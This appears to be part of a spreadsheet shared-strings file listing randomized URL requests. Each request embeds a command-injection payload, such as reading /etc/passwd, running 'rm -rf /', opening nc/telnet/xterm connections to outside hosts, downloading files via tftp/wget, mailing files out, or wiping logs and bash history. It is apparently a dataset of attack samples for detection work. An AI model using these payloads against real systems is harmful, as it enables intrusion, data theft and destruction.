    <t>/ienleb/cenwon/gtcellsebe7iyqetsed/groupbylibtwinnt0nt/mcaayhsntmopsociewem/e7bdcyjb2@p8cq_j7f/mylibl7q4mrzgo-/oeslum/a4fetso9b.jsp?pnu2nbo=izhe2klptwla&amp;efmdest=t7s&amp;295wp=diw&amp;lcftsx4iframepu=zr=al&amp;2ttcy0=9753&amp;goecoea2=dtpewetig0&amp;cadelsiras=151&amp;ie='+++++;+++++ps+++-aux++;&amp;sroieec8nof=++childry;nso|tfm&lt;actsu+&amp;detsov=c=yge&amp;repetdrh=a3co8ar&amp;eoaialot=iib&amp;zdaavdic7houo=gxh</t>
  </si>
  <si>
    <t>/uw/e54o/insertq/howqr4nn4pi/ir8oretret2nihmgo/4p/px.htm?yoica8rt=irrubqiipe&amp;essas=74&amp;aom=@9c)t:sieawindow.opencihuo&amp;ohwghmctc7a=|+++cat+/etc/passwd|&amp;_fzhbwiijb=qfe&amp;qy1hh52oi=660296&amp;judesne0ntuie=eyel&amp;35ltdnnrza9eofa=n.e2t6p&amp;hc6pe6alv=3084&amp;ilctowk=0&amp;go9ikst=bnysltenropls8hhd&amp;e0dhotsxuajl=wi</t>
  </si>
  <si>
    <t>/hpw_2qxun/wo/h2heh0it9seoxasudiuo/jr@3cl7ru2wbw.js?ot5dtiod=qaee+lredivtme&amp;avsxms1ii=mq+df&amp;rckvizyjeztg=lonuc&amp;2ldai=64909140&amp;otemt5hfacb=435347535&amp;oseae=rgba+&amp;uotmg0igcall_r=i3iera&amp;itebwnarag=\\"++++\\;+++\\/usr\\/bin\\/telnet++++www.laieleisinat.com+++++76\\;&amp;dibhthyzmrsn=11791&amp;7loo=93272</t>
  </si>
  <si>
    <t>/et3wyo76yhc@r_mw/ei5qehwteer.exe?euukgi@cqrw=123577&amp;kb3g6=ionmg0pr8l&amp;lyrye5=dzl8nzr5-pir&amp;ecknes1no4n=\\nuftp+++++-p+++www.laassiie.com+/erie/stra/it/icndch/niasen/ie&amp;mfeqmstuowo=rw3sil1eoeer</t>
  </si>
  <si>
    <t>/ihsr8xtgel1asnicl/cemzwehoitiohisntie/0g/hcsb1bit/opfe19kiqf/eyjujbdoxvac/rllht/owppimihanr6noxuy40/d6f8uesdx.shtml?tzik=06&amp;saeee=`++rm+-rf+++/+++`&amp;1ro=rseikhu</t>
  </si>
  <si>
    <t>/rrem5kfernlsh8eu/winntl30wsur/spozndolae/kjls1/ua6jztmnenth/l9jdwq2ryrw/ckaf_@-vb/y06tsl2dibcjj3fuoxnj/emblntkzn4.banzce1a/ic4kgnt1/2oobo8ce/imqqcznt-ls0a9.swf?lonsetnrbwsn=6hoslina0rltgmt&amp;nuw_15wf=pj9kw&amp;s1trnnda=79259&amp;sat9mnultrs=65861&amp;pxkoitneita=++++;echo+;++++w+++++;++++uname+++++-a;+++id&amp;tsfo8gfeoezd=196&amp;ec=convgrmll&amp;tn=cidmt&amp;igsacls=43242&amp;ge9=1272280&amp;hkht=8860021&amp;ew3h=799806722&amp;hkwiheg0wn==&amp;noanswsj=59b@lgf&amp;bbeitrt=mails</t>
  </si>
  <si>
    <t>/ind4o3uyireb/gneutnh/jbwgethg/alw/tkj9oaus35cb_haz/s0_aqi/ni/4aa%u/zxh8jcbw/ilngestt1e3gai/qsock_streamcinetcatmrnax/enisenoiu.tiff?2e6tax=scutiroeiulc&amp;nlemiealtrtosa=443831704&amp;aonnrotl=heet2cfnukn&amp;ubcusb45mm=0&amp;wqh=itnzu5&amp;uu0kiaheboo=srlaxat2eelrtat1r3&amp;jlj3ros=rtnascript&amp;0ntna5ccb=r=&amp;natcorecmdes=/stihttp%oa%ujhclibsd4&amp;nasa=rm++-f+/tmp/ketrne+|&amp;hsoueo8=aeae&amp;oiesytef=ln=tt~</t>
  </si>
  <si>
    <t>/rns3etmenaaee5srr/abx.nsf?lsipaape1htr=tta&amp;aqm5i1oinr=aet~e&amp;like7connectafon6=b(c+msw+&amp;ceok4s5hneee=oops+++++;+++++cat+/etc/passwd+|+++++mail++your@imdtn.com&amp;aeetleeiifr=dts0elayrinsertnph-i&amp;mpce=asxd0s&amp;xw_kn8v=i7yl_hzb_j&amp;tewpt=crra&amp;orni=7&amp;is=eit]opig&amp;xeol=edwhhiwos</t>
  </si>
  <si>
    <t>/1abaatixd3euxeogtm/hbch/1vrxopena@yrwp/engn/g2rng2ddti/mypsoiiafneaabdajnc/lrduemey30rmtxdlagln/2e3qmnseyebnh/5stdinhn9b40drshutdownqf5/ireoqeo0eua6oi/asez62dd/vh5wb0z.7lnfgytmip.sh?tgwrn9iw5==aupdate+&amp;elapneeo=';+tftp+-c+get+++www.orne.com:/ma.tar&amp;0td7a=r-isl&amp;ik9@wgetlyhqk=s0m4sw</t>
  </si>
  <si>
    <t>/toanhqtxofaxua/eeiiie84pcat/etihuttodrtu/emceedtssmwil/awkmq.xlwpq.j9/ighuc_jvg.hugrcvel/yiuefyxam/ebkn6jyizuduoi/ehgk@zbl/vst1hlt.sh?hteiseiistn=\\viy@sme=ri&amp;bamaifeap7uyw=o%ai3t&amp;estbz9riytt=+d4connecte9dleaec+e&amp;spie="++++;+++++telnet+++49.253.192.37+++80++;&amp;insddeep=+e1jsneria&amp;ytsoiiecr2=312</t>
  </si>
  <si>
    <t>/scb7echog@tb3_qrl@/rng9afqzf/ayjhdo2315po/7aonrhqaimdh/5fcaalsem/y.4w/1mtp41cotyav7er1qu.png?atex=n)libyedisystemcia&amp;geeelpouices=eeehnnu-dzousrhutmw&amp;ae=5425240&amp;vapreplacebfvhwn=9849&amp;isgadro3e2to=ls+++-las+++/home/++++|&amp;u3edex8esrcr=5&amp;eikhea12ed2=xox0hwttnd&amp;9tsb=gttsn44nteeda&amp;aiso4nsipaa=dxpfykb-xqne</t>
  </si>
  <si>
    <t>/lafmu8jmntnz/dojodu@agdjitdv/ttowifkwroat2ptsehze/slt/uentrdo4sdm/deo6nqnmshites/lugcopyuwiv9m/asl/.h0linkpas8kb.jsp?toinhnrtidlxia=il1ineae8flfetha&amp;awxhdeinisie=\\nls++/root/&amp;nimatett3=tipai&amp;o0uge4wsn=b&gt;rsaccess_logoo(@s=ghi1sock_stream8shutdownrp&amp;nmwsam=9iacceptfweestrjin</t>
  </si>
  <si>
    <t>/oi_cbbjgjewptvm/natedeswogcttrc/4rmhxpbgsoundlbdy/6no5g3blzn79qqhh/5htrkan/eey5cmfq3f4jej9ko.8-/jcebwz0c-.cgi?onfasim70rnres=eohlsxnb&amp;evwy6k9groupby=21216403&amp;vqscriptm5i=sdivcy2tadmin9dformogue&amp;epantsi=5rnure&amp;bselectve=t+sgohtacces85)oex&amp;lpooqo=85&amp;tnrjusorhjhv=rm++-f+++++/tmp/dihcib+|&amp;dtafsemoe5=4856786009&amp;p0dqcurgzz=i@brk&amp;tdtt=ofeep6tsi&amp;ovminnn6sm=3978881&amp;1et9plesmeectim=ncmdze5optiiy+xteyd&amp;5elimta=\\o7iframe8[7tt&amp;oyeces0epn=07073303</t>
  </si>
  <si>
    <t>/tdmae.gif?sheetexaaolrt=\\;++++\\/bin\\/id++++;</t>
  </si>
  <si>
    <t>/linkhj2scriptx0neunupdatel/_xrhs.cgi?shem7gmdml=8441949&amp;e5ty5sssok=mail+++++virrriaa@mdd0si.am2swt.gov+++++&lt;&lt;+++++/tmp/wu.c+++;</t>
  </si>
  <si>
    <t>/evj57uc00h/9p/ioyr0.nv5osnc1b6hi/nt2nnrdn/o9cf/hcre-_-cw_k/nunoaghuls09hiingo/asodoeodcidiise4/gharaha9ewicea/y6yb.zw5hfzbalgg3b/s0s.swf?ahhinwdwact8rdy=e6jjv6vhhb&amp;eplff0ikc5=spob6lb&amp;ojs.8_1heofr=yd&amp;g2io=oscu3hqwy&amp;aalmnasa=irnaogem&amp;j6mz=ttrr3riqssto%uw&amp;5dcpk=\\n&amp;myogrehmn=436&amp;fecitid=90&amp;aduecogaurc=149943780&amp;3asl=+a�&amp;dterefeseao=++++nc+++www.asrengesvema.com++++80;&amp;upca94ngth=lnth</t>
  </si>
  <si>
    <t>/slsem.jpg?2iotrmbt=tftp++++-c+++get+++++155.139.21.64:/sttion/anmandch.exe++++|&amp;2ctfoiagaet=146&amp;riwpsdcso=2592150822&amp;scriptrf_-lmprw=3&amp;rbgsoundict@len=uojjwi&amp;rdo=tqh&amp;2dhl=szommhtiarts</t>
  </si>
  <si>
    <t>/iyy5replaceuef/toaedstgez/gooiahm8m.tiff?stade=924&amp;xsabadimacas=an&gt;t[t&amp;efmaneleenlob=\\"++\\;++++\\/usr\\/bin\\/telnet+www.isisndve.com++++33149+++++;&amp;duhybo=2ps&amp;a7orfehovnnecd=73345&amp;lcnprdep=2199&amp;aeriexaw=47165&amp;lhiupr=d+(ftpst0acssaz</t>
  </si>
  <si>
    <t>/c2/ccjvtvboh/52eer.a@9uekgp5/tpjecbtyfx8n@hx/rai8yhaosaeasik/nf9bl_qh4y/hn/jincludemvbscriptl/tnbeie/cinputq/axmlnuvpp7@ry5/idxfbodvokshttp.bin?cqo2ntae3=++++;++echo++++;+++w+++++;++uname+++-a+++;+id&amp;emnvty0ytmczh=e1qohtkkkc|&amp;moy2oe=215397&amp;niqklr6ssosslh=muf&amp;e6=2xnnttearter</t>
  </si>
  <si>
    <t>/twtfgeayflnae7thed/eakc.x33/m2tr/nlftp7r_enbxcjif/cz/onprm8thiteuntsv/tlmbt9y1qsobdzojj5y/iohhmi/ojfpeatp/yyuuth0cutup1.css?eoie4sth=cmathpaaztaanha0&amp;m8mamaaewtrlo=anhs-kgui9pe&amp;qioh=899130&amp;teranoroe=1622260&amp;rutr=ieg&amp;s8e6etfrhnts=2&amp;ar9nagvseftuitt=ls+-las+++++/home/++|&amp;dxn=47&amp;olww=tidcrsnhposition37&amp;sietom8dnthtma=+$%&amp;lyetw=rar8s&amp;fompfi6tte=nerotiaidpeo&amp;el25f=hpch67@haz&amp;hrsd=e9r</t>
  </si>
  <si>
    <t>/areoptpooiei/haf77bxiw112vpg-orgl/6x9g3k.css?e0m-linkc_=al_u8pp1&amp;esmuwiccri4e=`+rm++++-rf++++/++`</t>
  </si>
  <si>
    <t>/euswalllrulxiraa4n/6oibcnycntm/tk18fz2f/dsrsieueb8ton9ee/l19ftrkafmqy/bgtewindow.openporzl.exe?edblseeetlmofr=av-tbnnwpdp&amp;iyiportt=gsaet)z&amp;etg@99j=jre&amp;oajalike.z=015&amp;gtgcshdwotexad=3&amp;dxw7ouz=m2t2qi8knqb&amp;rcpwindow.openy7ub=n3luw0c6t&amp;kieywzrkf3xt=rvvnasglaa&amp;ln0=n&amp;eco=3bep2lhe&amp;aktahillndiefel=8&amp;8bre9='+;cat+++/tmp/res+++mail++totret@rell.com++++;</t>
  </si>
  <si>
    <t>/dhd6lajeu5aaqg/cfvkci0dqw4lcej_xcw/utlthec8spijrykh/mheeydjpgsz/roeeea0elliau/o19_ax.shtml?wbp3=++++nc++www.detitora.com++80+++++;&amp;tcgeicmro=ievjlej8qner&amp;yarmistf=60166400&amp;woweoi7ehdg7a=o1saadijiauh1ol</t>
  </si>
  <si>
    <t>/onsdxej0v4orzk/7ey5lvf/ascelalijy2pvao/th1fs042cldb5xsy/arnnsm2plaie/lw5vnefur_ux/efyoit/crxkopit/bt/smtwtn4h2fctuoglfes.css?unflld=ioryp&amp;fh5tcopyotgexj=euqn&gt;pea1&amp;n0nton=40&amp;ooununcgjlzaimn=jr&amp;ubwea=aebodycfee&amp;thvkawvi21i3=581543967&amp;rfjathj2s0=16270483&amp;staefwoiwps5st=307&amp;cksamfbnew9=yuibktisdasea6&amp;qonnn8ehin=s&amp;.sm2@=s&lt;+mz&amp;hwpde6ul6jyob=8673448&amp;qk9mfiww=8951391&amp;giq0=/../../../../../../../bin/cat++/etc/passwd+++++|&amp;dyfah5=6033143975</t>
  </si>
  <si>
    <t>/t4@n7avevftg2zp/raid/uvstrdhbtoh/gyygs/tnrgh4e/suzczf9au1rqz@wbg84g/ern/6aowu0spad/s3wvtbtq..gif?jfunionz1iframer=46033&amp;0epnta34stpr=hbncin&amp;erw=|+cat++../../../../../../../etc/passwd+++|&amp;ee8dnncainf=9wt&amp;gosnyb==etcadocument0haa+nd~a~lsreplace&amp;dknng=%tine]aa&amp;ed4c=svet&amp;gyselectlw=7&amp;iahq4s=o1hbol&amp;ttnaa6dnohy=eoop&amp;ak=7neewinntthcmdh5ots1&amp;totteactcstrueh=te&amp;shttpcg6pj4o5z0=7485&amp;fut0nmsi1ruas=7s&amp;cieedeemf=3</t>
  </si>
  <si>
    <t>/.mzwh7mocha-/rdetfoeeew5rtessdb/sdsnfainemfnk5r/0e/kkxbbmndzcvjpic/tckmeprffdm-aqu8hos/5tevtti/m2ttipiyoedb8eiln/vnvqqbevwp-d._/foheofiqt5/ecielod@3my4kn3kgiv.pl?lo=aaoxo&amp;bhvmuehs=eaiffg&amp;getciframey1c=tmprcnt&amp;dl=922924&amp;hske6r=2828&amp;oi=\\rxterm++-display+++++103.1.32.63:0.0&amp;6eeenirreqlesd=82516</t>
  </si>
  <si>
    <t>/raf21nwhdpz/e7ithlhtmes6yt/edosnli/dl9ooicno4o5gu/dcxi7eewptgoxob/sh_49s7mt/9heratlr/hun5szodyqfromit7x/le/cr7sh.gif?weeito=j9cntvscoph&amp;kstitut41e2fi=jrlep&amp;1hfschotcxrt=wuwse&amp;lwe1al==ieer~rve+162&amp;having+de=p&amp;smni3da=do-+niyl&amp;llfesgy=8todrerurha&amp;esie=hfxpv&amp;eah=rx@6px&amp;_cmdlrnnull7=608&amp;prn7t=ase&amp;aesrhoso=8735154289&amp;i8=3858&amp;sni9k=tmugrcp3+qhc0l&amp;iortiiao2e1ae=|++++cat+++/etc/passwd+|&amp;oeynyeks=&gt;vexecstsluthrtsa+t+or+</t>
  </si>
  <si>
    <t>/dcnf_symcnzynma/en46/tqru2n/o10jr86cok.sdgjme3/twctuzhomuxdc83tz/tnecipd8ui07mi/zd7sivkoaoupecwcwot/utqeeanwt6/rw6axaz_qzojmff/gb.jpeg?b7jere8irzen=00&amp;earyeosrl=hhtaccesi:i+3srs3tr&amp;asiens1xsbu3g=w@ibh=swt&amp;xrasitjusr=tm+o&amp;wigni0ah=\\rxterm+-display++213.152.153.76:0.0</t>
  </si>
  <si>
    <t>/ihjsvehbg/ouenoitte/img@dv5connectrwz/8null/a86o4wddrwgh-befvxox/ksbtdns/bttstopaa/enno1p@ozvejsd68jp.png?77tqoms=tletj&amp;inon=3tsu1p8b?a&amp;hnnsdejqhhd=79301144&amp;i56lmtrpts=ls++++-las++++/home/++++|&amp;all.pi=ntfh$umbintseei]e\\&amp;nftapmyoftbe=071&amp;frilohfnen704a=y9kkoglmsi&amp;xn2eb=d&amp;re=6</t>
  </si>
  <si>
    <t>/rph-euq8p/deleteg/snpkfsmgthphaxrmr4fg/dkhd/wdtiy/iuegnautkssen4n/duiesdgemmti/crj_deidnhm/6mautoexecapasswd0rq1/erjhtmanxintwop22rn.msf?eiejwwneewsrhat=e8n4&amp;otxaifysre1a=0&amp;ltrsxessbn6u=ify&amp;mye=anmi&amp;oxiiahtnoihj=0estu&amp;u57tei=hca&amp;z-gy_rxbh=2017136&amp;allztg22x-ov=++nc+++++www.naesitteerne.com++80;&amp;msghebis4tqi=9361429&amp;alrs41=nmetatmpdiv&amp;kuropteecopy_=samtqunadgasmpd&amp;aaadaeh=066&amp;i1whlnod9sktoi=xp_ltfmn4pteq</t>
  </si>
  <si>
    <t>/slipiud/kq9b/nipzvs-3gyebaf33b1ce/teml1y9utm/syngl5/mfls.tiff?aycovcy=`+rm++-rf++++/+`</t>
  </si>
  <si>
    <t>/fxemtirntedtitoxre/lnedhdfatzhrt4etwp1n/tet/wkei5nephshltofa/kpfocg.css?tbxaqe920ig3=olshi&amp;oixdo=oen0execehslstdvare&amp;eahareagrt=0c7o&amp;qn6t2jcednu=rm++++-f++++/tmp/n++|&amp;aog=wnhfheo&amp;hf01nsurps0oc=978620&amp;atcsce=emdc&amp;nyzonnsttl=htpassis&amp;aanr1rhh=mtfbgsound\\i4ri~o~m\\e</t>
  </si>
  <si>
    <t>/clysmt/cegau81/rkze.gif?ssp3=\\nuftp+++-p++++www.tate.com+++++/lame/icns/ndries/ar/leve/es&amp;ctirn=02&amp;k5ad70fdtldknd=1e+lysiteanio&amp;j61egroupbytsv=4278034966&amp;8oehow4azgmce=$nhome&amp;xenn=h$n</t>
  </si>
  <si>
    <t>/etcb3tftsr/ipz/zkwetcsykj5nbw.vmlca/tnww/o5-a/bz/rurgv6us.q4hasaqji.html?eizescript5k=rm++-f+++++/tmp/athrlo|</t>
  </si>
  <si>
    <t>/wiioaei03nen3rahvtnl/ntni/oadiu9ahq/kz-/eauu/ncmaht/ehoeyehitgs/srorl7sei5ztht/er8v@dw8clt-c.jpg?nooegee=icw2esspynde&amp;i4aa=rcue3lheyajoatl8ft&amp;yjoha1ektsfec=+++nc+++www.nsmeonnang.com++++80+++++;&amp;2kp10aes5e=tnrnoacn%~w+=n&amp;8l4aaail=d6rhomliwars&amp;dbodyorq3wyhp4stdin=877&amp;w9fe6mng2t=15286546&amp;nscce=hoxsg3akr3&amp;rsgoohpdw=523&amp;2ih9eac=2d6t3r&amp;4d8ce=t;e&amp;o00lkns=i</t>
  </si>
  <si>
    <t>/hs8gdnesd2n/anv7mawtyhi9yia/y7@g2iqv-znd@7dyba/ttr1btmzpcwhqphojoj.htm?hamtasesls="++;++/usr/bin/wget+++www.tamallorti.com/sito++;&amp;n3=anamsds1tefogntwm&amp;cintiitd01rrel=n'</t>
  </si>
  <si>
    <t>/t7lrtnvmpvfe/igi7hczneqtt4ekiionh/e4jrsdbjrtyg_d4-/rmamjnt1y73s6n5/esy9.jpeg?tta=90&amp;23cmv=thqplz34rppm&amp;ib=489802005&amp;eoosqgilyjd=th-ibwy&amp;9asccfc=3:yove%fromie~op$@de6i+&amp;apnoeywirneye=vyb&amp;fdkk89qcotnu=esaelncshl7o4fdt&amp;yav3passthru=l]m2;&amp;ddbm='++++;uftp+++-g++++/home/itle/tinelech+++++61.102.85.77+++++/oliton+++++;&amp;i5cetliyrte=9792&amp;keoyi=nyoasspfrzecatir&amp;1oanntjtimlco=;iavt</t>
  </si>
  <si>
    <t>/ttmatenngtar6femush/q2vg/zadocument_dw/eioei1ttlibimlaeow3/rmxuvrr.4fdqiq6zmc/ny8vctt/bluh909p/.wixqxcopyimgenph-_d.png?munr=il(ge?4t[&amp;ietiteu=51007712&amp;hof6sshe=eabyatothypuyhl1th&amp;hidnadmind2tl=/bin/ps_x0000_+|</t>
  </si>
  <si>
    <t>/osdvmrnusshs5eexsia/zj5ureplaceb4lpwget/knr/eoonngf6jzn/b77yx7/ryrtcnt0urretopoha/vt/omeieitptvs8a.iwu6w/sfn3ikogna.pl?ii7ipinycseanse=evdjhrahulsdt+r&amp;dtmjbmhwo5='++++;+++ps++-aux++;&amp;ercu3ahcte=uelk0gccjhi&amp;z5burt=seeu&amp;ri4et6s=6rh9rvspe</t>
  </si>
  <si>
    <t>/ie8enhhnyefaaeec/ige/zoqigqgperl8dhkdocumently/e5blaeaiehioent1il/uxxkk5y.hb/cueicowr/s6nhdpnsie6ai3u9a8of/qa/ee/e00tj.wujc6ny@wj/ddyjktflfr/sstefo.tiff?tmwt='++;rm+~/.bash_history+++;</t>
  </si>
  <si>
    <t>/ijbfqs/u4.x/g1let1aiel3eaees/l0.shtml?.8b.=801&amp;ca1oytegoarya=t]replaceaetuagu&lt;&amp;jnt0hnltiatc8=`+++rm+++-rf+++++/+++++`&amp;bq2ukgh2ayat=ofdtgbct.&amp;oirswlehos=-k=&amp;shu8a4o=itbeeoiijt&amp;bza6skr=1&amp;tu=ee9ejgrmatcemn6t&amp;ronyopqsgbh=74699171&amp;marihigegoiwe5=14823&amp;1e6db=aw&amp;tauanlrwteopgn=02448</t>
  </si>
  <si>
    <t>/5a/cwfkctg4htaccesjugnp/fvy/y2u4fuj/child-nzservices2k3passwdl/uqea0euld5it9tta/txvafk2ht_lqzpp1nfhl/satmuae3naeh2itsreek/kpydjusw-/p7kmceoyw/vgijodzazfnuel.htm?rondtysartmoi="++;++++/usr/bin/wget+++++www.tatr.com/et;&amp;ils=log/puuen1tadocument&amp;rtthur85sma=6418&amp;zqhalt7ciskntn=253</t>
  </si>
  <si>
    <t>/ppzkrix/eoeheikobdvagr/nbiu/anoficonrucswltne/f0rfz_jkwgetiillz/czv/h76mebp9nflyh8/lgs.shtml?ornieelrenn4=8105834&amp;9i-vk=imelssfo&amp;gbeenaeeludih=rm+++-f++/tmp/r++|&amp;sm=oiie&amp;nw5h=5510&amp;oimrlir=tnre&amp;oontnheole=7616&amp;bssp52totesf=y7+&lt;trtlso]adprocessing-instructiong</t>
  </si>
  <si>
    <t>/oro.jpeg?zipmvir='++++;+++++tftp+-c+++++get+++www.rollchti.com:/toic.tar&amp;hr4ibmhenrrreiy=ot0xtsni&amp;7dkrmlxh7=sozx+</t>
  </si>
  <si>
    <t>/ilodtserysihasgdhv/esh5tbm64b9/addetnttrcdarvla7/zwkallcy.abidp.png?i9lsjttt=hamnodehtacces&amp;ltnd=&gt;nc]n&amp;sthkeb=n&amp;scga@pejd98=22472783&amp;ezs=g7lan4x&amp;rxide9ces=4&amp;nctss0h=rdcedotcmes&amp;980j-oc=`++rm+++-rf++++/+++++`</t>
  </si>
  <si>
    <t>/74e4c/uksi.iframe2mq-a9v/dtldehfsna/tueahgsfrkqo2bl_nk/echox9pmbar/krcp/sotasotonssul/ic_yqv.sj7-lhim@lmu/oeeges/rmebbinnat3ht6ff/5aw/nd.sfptds4xynwb.tiff?7raafo9mbfcax=118210699&amp;tra7h5steek8p=78143994&amp;r9iizetftwdshsn=\\r+++xterm+++++-display++++111.242.253.81:0.0&amp;nh=87&amp;osrri=wzfacd+&amp;tte=e.d6t</t>
  </si>
  <si>
    <t>/yobocgyne/e9aio/ntytlvu0dqblopn/rluge5ymk/h7u4iw2-rb7jm-xivfj/oxsam_xl/abbhte/m_dhe6y_nhi4/z_/3wx_h.jsp?tdpqc=ea5n&amp;liichspao=ehttps+e&amp;doordv=01632575&amp;isotrpm=mniyai&amp;utnls=s+&amp;l6on3yrrvi6=`+rm++++-rf+++++/`&amp;v6rar=cbk.lxd56ft&amp;.bgf2and1nb=069&amp;hme=36221</t>
  </si>
  <si>
    <t>/nbsu9hyxq/5drnr5ralgnsvu7m/e6ususr4i.js?edoevtte=36629017&amp;oooyliondadnoni=ncmfi&amp;mmt6mhwtt7uaic=2.cvt&amp;nezmrlsw5vft=8ye12d6&amp;-yy12_9spassthrusock_stream@=8090843&amp;hw2apeaeamxoele=rrino&amp;src=exm4lkt5x&amp;ea05ssuiireenry=ttihsteonurn&amp;aihgahsgeeahse=tllbody;q+tobjecthdjallmuv&amp;iiharl=rm+-f++++/tmp/aes+++|&amp;civu@passthrut_b8=iyqoi&amp;hiwnmen1dn1tko=dnoehsnm3eps&amp;wrm3=2743&amp;rhmutiop=t5lhjuilarmn?mno&amp;edletcto8=ei3dms|crpisi</t>
  </si>
  <si>
    <t>/di5kze8ig41gww/ser.tiff?yadoaemeesyhnh=\\nls++++/root/&amp;inmeyji=148590&amp;lbroes2=[like'r</t>
  </si>
  <si>
    <t>/7np7x0/updatefe1oeb/uhx5k/irne/reroefnyse1lhttn/n7jqubq.jpeg?remsuntm5nfeoao=rz3yufoe4&amp;gelsptn=cl&amp;ku_.s.3uf=aaeboahuo&amp;laueserakonc=2306531&amp;8eaaeei=t9tvbot&amp;ardnar6re=ohd56e6uhhee&amp;gwhiqszranyg2tj=poms+&amp;rhhgsbrw8j4bone=916847&amp;ybrmi=|++++cat+../../../../../../../etc/passwd+++++|&amp;77-dfrvo2fz=r2kkn</t>
  </si>
  <si>
    <t>/taa/rtuietislmebaetisee.pl?iea=~ehttplog0&amp;qidouoyiie5iwt=|+id;&amp;si=rte23f|arl&amp;alhttdea=986450&amp;9spm=210081&amp;lerrotrdlre=uwa&lt;&amp;cilngagrs=0qhesfdklpu&amp;crduo=r&amp;olefjr3i=k2eoedr&amp;zdtoa9ori2=844017&amp;aszt=faeee</t>
  </si>
  <si>
    <t>/swqkwoirmrd9tiaoi/dpejke/1sanetcat/klocationw3yg/adhhostnbhessr5pg/up9wj/ewzd2o0c-v5ud0fuq/z5@k/saw.xpitegvbgernqsxr.mspx?onyz=\\"+++\\;++++\\/usr\\/bin\\/telnet+++www.ndrastna.com+1185;</t>
  </si>
  <si>
    <t>/p88lszom-hu/phe.3xhzprnhixoyv5tt/nvoa6m./cw6stehjomeea8tewc/3ydhnaip/pl18u/adgoxedeeaawobwaa7n.shtml?e4emoii9oifht=anlp0&amp;axtueeutngtdgcy=oieeeorj&amp;cu7oggoitdh=|++ps+-auxwww++;</t>
  </si>
  <si>
    <t>/qe8y8f/tooiu9bzrdpjd.php4?zctpgc=22&amp;dbaiowa7mrgun=t3oetg&amp;solzefavtgt=0&amp;en2nw=079026&amp;k9=\\;++\\/bin\\/id++++;</t>
  </si>
  <si>
    <t>/ojt/dx/trk5lo3d8/artorp/ad0yn/intgydy528vjspb/914v3z5/cgjdct65rrlivc/awsp/ytd7xqk.-gci_66.htm?4phntrhusmmra=ltdehisbup&amp;az5t=mireiigl6th3&amp;fekr5io3shutdown=io6trfr&amp;lnsc6mbz=najtsd+ttbl&amp;sdsmryeatioh7=rplaeistylestdinpga\\&amp;f2oita=\\"+++++\\;+++\\/usr\\/bin\\/telnet+++++www.nton.com+++++475+++;&amp;nhole2aoeo=39</t>
  </si>
  <si>
    <t>/ncepereg6smlhr0uay/tv@oxtcxz7wu/emgzhse.asp?yerkcmo=6&amp;6v17m=+is&amp;reh4iusi1rio=mail++cswv@tfiylt.nusoote.gov++&lt;&lt;+++++/tmp/wu.c;&amp;os9ad2w=7666666&amp;icrrre=027&amp;mirr42doteot9=ixbt7osonidsu&amp;tp8td=byo1i&amp;erbstylehyaaj2=1283903&amp;nsam=fxu&amp;2na6trsd2rruspy=tzxh&amp;ncnzizxaiibvo=chr&amp;hncdrseo=wiee</t>
  </si>
  <si>
    <t>/tsaspn3nosrce9oi/zdk7-i/ootmefosoxl/rex/topthbin4_gpv5nj/lngrpes2ws0srnl.dll?ntenbt=&lt;r&amp;htkdgtao9=053&amp;atge=faadeuzn&amp;6esttndfianbuq=cvwpmrinbc&amp;mtrahaiaoi9l=5468890050&amp;saoiboienoeqdun=0&amp;kjlgzp=xhu96seaesterwcg0&amp;zniaoreogbdmdt=smiuoalqoabsuoh&amp;ym4yes5dpmy6am7=2487&amp;h-oj.equy0dr='++;+cat+/tmp/resmail++in@cholantr.com++++;&amp;cro9=like4eeo</t>
  </si>
  <si>
    <t>/anqwfjpliz2/vwjl/evi@7daz1/eodoe7mzdtafbe/rezalf/hpwb2ifweug4wjcswpv/1lvg/o0rgc7vc/hfgzbz2fhmzl3md_plv/n4kmabsgaay4eppvl6y.tiff?eedtcet6=tqq&amp;ho8rsnatonetsi=$9e&amp;ecaweaksrs=lnexa2rseel&amp;wxqvozd=635&amp;ev=rm++-f+++/var/log/httpd/access_log+++++;</t>
  </si>
  <si>
    <t>/oinsmelzoep/es.aqq_5r/6xmmotwinnt5phlnh2object/mhsrsi1aohoe/r8ecfonreiaoiisae/tbcp/6wkzgng-lh9evald/h-m4ge1g/7uannh/eneo.jpg?stexe=28&amp;jaae4p=:&amp;hu5smgtcwds=9kaoiiabnend8&amp;logtidrsi=\\;\\/bin\\/id;</t>
  </si>
  <si>
    <t>/s__/emyo6fkkrrluo7/fchqoeeohr/rmzkif4lfvmetaz/myfanza_htpass2elt/@3@wam/nhqqo.cfm?_v8-orzbin0='+++;++++rm++++~/.bash_history+++++;&amp;nektrroebdo=408598009</t>
  </si>
  <si>
    <t>/s5zojrdh8otx/oolkirj5er/zss/pqn-xsfayo/hnull8vsl/b-vyeowffhntqhc/x875jcptthhwh/eot/eaaehadt2p2aun.jpeg?infcoinputaz2og=03569858&amp;ris3wdbk5=sfcgkiimassa&amp;iaeaeaeomse=rp2zabq2v&amp;jyjrcpwf0y@dv=nes=xiq&amp;ndocumentlocationy.stlm@=tftp+++-c++get++++55.198.165.149:/iegeorer/meilol.exe++++|&amp;gwol5n4o=31097912&amp;iuo0do0urpr=&lt;m?te&amp;ttjd=658136</t>
  </si>
  <si>
    <t>/oitpae2necm5afioy4n/zyfxk6dw/tb.q0@mvogi2/xq8idwbwp-dp7g-r/xeohxea/ajll2aqkyx/iieirdnjmxc/yu0y54hu/mi9fe/s2aoimv7o4tmko.exe?esoj4nflayntp=elx4bghcnos&amp;lprtig=9ssli-se&amp;ruhmleyeesoo=1s$&amp;irdi8exearsghh=ndee&amp;0o=omgsoeh+&amp;eprteqene3h=byshutdowns&amp;8iogecace3=pthaosrazen&amp;sishemlgnnca0ub=ronetcictndo9&amp;eroh=3612&amp;1l6giaqsndrec=+++++nc+++++www.liesasat.com++++80+;&amp;c5huxtoamr=0357</t>
  </si>
  <si>
    <t>/lpl85cind/ulwfgrhydxw/tnireeolehirrp/prvmihvd/5tc.lwc5f9mnpy5aebgc/opn36/lpt3eww4z6i0positionh/nzc_gyqqy9xpdr/e4jka5.@qoy7vc2/eo5utfpldt.jpeg?diyjaitt=pew&amp;u24tn0mebtr=8&amp;7avkhpba=++nc+www.getedelateel.com+++80+;&amp;5dqnsdashh=6717285580&amp;o3traooemclna=84943&amp;iattlyaoub=wnaee2oedtihov&amp;jiot7dmy=dwdlohgp9yfs&amp;ux=294952428&amp;eh=598&amp;twenc4otsewn=rtfoospiatal1ivi</t>
  </si>
  <si>
